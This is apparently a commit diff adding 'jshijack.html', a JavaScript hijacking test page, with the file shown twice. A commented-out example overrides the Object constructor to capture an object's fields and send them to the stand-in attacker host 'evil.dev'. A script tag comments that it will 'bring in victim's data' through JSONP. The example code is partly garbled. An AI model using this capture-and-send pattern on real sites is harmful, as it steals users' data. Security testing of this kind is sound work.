bjeavons · September 30, 2021 07:00
diff --git a/jshijack.html b/jshijack.html
 <!DOCTYPE html>
 <html lang="en" >
 <head>
 <meta charset="utf-8" />
 <meta http-equiv="x-ua-compatible" content="ie=edge, chrome=1" />
 <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0">
 <title>js hijack testing</title>
 </head>
 <body>

 <!--<script>
 // Example:
 // override the constructor used to create all objects so
 // that whenever the "email" field is set, the method
 // captureObject() will run. Since "email" is the final field, // this will allow us to steal the whole object.
 function Object() {
  this.email setter = captureObject; }
  // Send the captured object back to the attacker's Web site function captureObject(x) {
  var objString = ""; for (fld in this) {
  objString += fld + ": " + this[fld] + ", "; }
  objString += "markup: " + x;
  var req = new XMLHttpRequest(); req.open("GET", "http://evil.dev?obj=" +
 escape(objString),true); req.send(null);
 } 
 </script>-->

 <script>
  foo = function(obj) {
    obj = new Object(obj);
  }
  Object.prototype.__defineSetter__('Id', function(obj){
    alert('foo');
    document.getElementById('obj').innerHTML = 'foo';
  });
  Object .__defineSetter__('Id', function(obj){
    alert('foo');
    document.getElementById('obj').innerHTML = 'foo';
  });
 </script>

 <div id="obj"></div>

 <!-- Use this script tag to bring in victim's data. -->
 <script src="http://example.com/?callback=jsonp"></script>

 </body>
 </html>
	<!DOCTYPE html>
	<html lang="en" >
	<head>
	<meta charset="utf-8" />
	<meta http-equiv="x-ua-compatible" content="ie=edge, chrome=1" />
	<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0">
	<title>js hijack testing</title>
	</head>
	<body>

	<!--<script>
	// Example:
	// override the constructor used to create all objects so
	// that whenever the "email" field is set, the method
	// captureObject() will run. Since "email" is the final field, // this will allow us to steal the whole object.
	function Object() {
	this.email setter = captureObject; }
	// Send the captured object back to the attacker's Web site function captureObject(x) {
	var objString = ""; for (fld in this) {
	objString += fld + ": " + this[fld] + ", "; }
	objString += "markup: " + x;
	var req = new XMLHttpRequest(); req.open("GET", "http://evil.dev?obj=" +
	escape(objString),true); req.send(null);
	}
	</script>-->

	<script>
	foo = function(obj) {
	obj = new Object(obj);
	}
	Object.prototype.__defineSetter__('Id', function(obj){
	alert('foo');
	document.getElementById('obj').innerHTML = 'foo';
	});
	Object .__defineSetter__('Id', function(obj){
	alert('foo');
	document.getElementById('obj').innerHTML = 'foo';
	});
	</script>

	<div id="obj"></div>

	<!-- Use this script tag to bring in victim's data. -->
	<script src="http://example.com/?callback=jsonp"></script>

	</body>
	</html>